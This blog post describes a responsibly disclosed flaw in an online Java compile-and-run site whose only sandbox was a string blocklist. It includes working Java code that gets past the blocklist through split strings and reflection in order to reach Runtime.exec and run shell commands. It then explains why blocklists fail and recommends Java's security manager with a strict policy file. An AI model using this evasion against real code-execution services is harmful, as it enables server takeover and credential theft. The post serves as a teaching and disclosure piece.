Perils of Source-based Sandboxing

I recently found a new website that will compile and execute Java code for you. It consists of a large textarea input for the source, a few buttons including "Compile & Execute", a panel showing output from the Java compiler, and a panel showing output from the code being executed. I was curious about whether any sandboxing is done on the site. If not, then an attacker might be able to execute malicious code directly on the server to take it over!

We could make the attack code natively in Java, but shell commands are easy. The following code is a simple test of launching bash with a short script.

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.Process;

public class HelloWorld
{
  public static void main(String[] args)
  {
    try {
      Runtime runO = Runtime.getRuntime();

      String[] cmd = {"bash", "-c", "ls -la | tee -a /tmp/touchtest"};
      Process p = runO.exec(cmd);

      BufferedReader brO = new BufferedReader(
        new InputStreamReader(p.getInputStream())
      );

      System.out.println("Exit code: "+p.waitFor());

      StringBuffer sb = new StringBuffer();

      String line;
      while(true) {
        line = (String) brO.readLine();
        if (line == null) break;
        sb.append(line);
        sb.append('\n');
      }
      System.out.print(sb);
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

Trying to execute this code on the site gave me this program output:

Unable to execute program; disallowed functions!

Use of package 'java.io.' is forbidden. Use of package 'Runtime' is forbidden.

On first glance, this looks like reasonable protection. I vaguely knew that Java has sandboxing abilities, and it looks like that packages and classes allowing IO are blocked.

Well, it doesn't quite rub me the right way. Are all packages allowing IO blocked? Doesn't Java let you block by permissions more granularly? Why does "java.io." have a trailing period in the error message? I'm not sure I've ever seen any Java documentation or tools ever refer to a package that way. I don't think that forbidden package error is from a real Java tool. Could the site just have a fixed list of disallowed strings that it checks for in the source before executing?

I wonder if the site knows that spaces are allowed near the period delimiters. ... Changing import java.io. to import java. io. in the code makes that error go away! Yep, the site just has a string blocklist. The "Runtime" string is still blocked though with another error. As I mentioned earlier, one doesn't need to execute shell commands for a good attack, but it seems like a fun challenge to get that working anyway. I'll have to figure out another strategy to fix the "'Runtime' is forbidden" error.

The good news for us is that Java has Reflection APIs which allow you to load a class by name from a string. We can construct a string with the word "Runtime" at runtime! The word "Runtime" won't be present in the source code. Just for fun, we can use reflection to load the java.io classes too, since the trick with the space felt a bit cheap and could be countered with a simple regular expression by the server.

import java.lang.reflect.Method;
import java.lang.reflect.Constructor;
import java.lang.Process;

public class HelloWorld
{
  public static void main(String[] args)
  {
    try {
      Class<?> runC = Class.forName("java.lang.Ru" + "ntime");

      Method m = runC.getMethod("getRu" + "ntime");
      Object runO = m.invoke(null);
      Method exec = runC.getMethod("exec", new Class[] {String[].class});

      String[] cmd = {"bash", "-c", "ls -la | tee -a /tmp/touchtest"};
      Process p = (Process) exec.invoke(runO, new Object[] {cmd});

      Class<?> isC = Class.forName("jav"+"a.io.InputStream");
      Class<?> rC = Class.forName("jav"+"a.io.Reader");

      Class<?> isrC = Class.forName("jav"+"a.io.InputStreamReader");
      Constructor isrCon = isrC.getConstructor(isC);

      Class<?> brC = Class.forName("jav"+"a.io.BufferedReader");
      Constructor brCon = brC.getConstructor(rC);

      Object brO = brCon.newInstance(isrCon.newInstance(p.getInputStream()));
      Method brReadLine = brC.getMethod("readLine");

      System.out.println("Exit code: "+p.waitFor());

      StringBuffer sb = new StringBuffer();

      String line;
      while(true) {
        line = (String) brReadLine.invoke(brO);
        if (line == null) break;
        sb.append(line);
        sb.append('\n');
      }
      System.out.print(sb);
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

Success, this code works on the site. It runs "ls -la | tee -a /tmp/touchtest" in a shell, listing the files in the current directory, and writing a copy of that listing in "/tmp/touchtest". From here, an attacker can scope out the server for more files and directories writable by the user running the code, possibly manipulate the site, gain further access to the server, or steal credentials from it. It's possible that the Java code is being run from a unique locked-down temporary account, nullifying much of the vulnerability, but maybe not.

So how should code like this be sandboxed? Are more string blocklists necessary to cover the Reflection APIs? More flexible regular expressions? I don't think so. You would have to look up all of Java's APIs that could be used for reflection, and update your blocklists as Java adds more. You would also have to carefully study Java's syntax to make sure you cover all of the possible unusual cases, like spaces around delimiters. What about null bytes, unprintable characters, and invalid UTF-8 sequences? The handling of those might be undefined in the standard. There are many possible edge cases. (And then for other languages like C that allow macros, you would have to implement that too in the blocklist checker. If you ever find yourself making a turing-complete blocklist checker, you might be doing something wrong!) You might as well use Java's own syntax parser for sandboxing rather than re-implement it yourself, and then at this point you should remember that Java already has built-in runtime sandboxing abilities.

I decided to read up on Java's sandboxing abilities and security policies. Here's what I found out. You can enable Java's security manager with the -Djava.security.manager="" argument. It applies the default security policy, which on Ubuntu 12.04 with OpenJDK can be found here. It's pretty locked down, except for a few things. It gives permissions to any extension libraries, which might be abusable. It gives permission to act as a host and listen on sockets. It gives permission to "stopThread", which has a big note that it's potentially unsafe. Here's a stricter java policy file without those parts.

With that policy file saved as "/usr/local/share/java-strict.policy", a Java program can be executed in a locked-down context like this:

java -Djava.security.manager="" -Djava.security.policy=/usr/local/share/java-strict.policy HelloWorld

Note that Java's sandboxing ability has had a not-so-great track record (see how some browsers default disable the Java browser plug-in nowadays), so it may be a good idea to run the Java code inside a locked-down account in addition to this depending on how important the server is. And I don't think the policy prevents denial-of-service attacks that take up a lot of processor time or memory.

So, in conclusion, if you have an automated system for letting other people run code on your system, make sure you have a good sandboxing system in place, and that the sandbox system isn't just a fixed list of disallowed strings. Besides online-IDE sort of sites, this seems to be an extremely common problem with systems for running programming contests. And in contest situations, the participants have a big incentive to try to manipulate the scoring system itself! Make sure the scoring part exists securely outside of the program's own sandbox.

I reported all of this to the site owner, and the site has since switched to using Java's security manager instead of the attempted source-based sandboxing.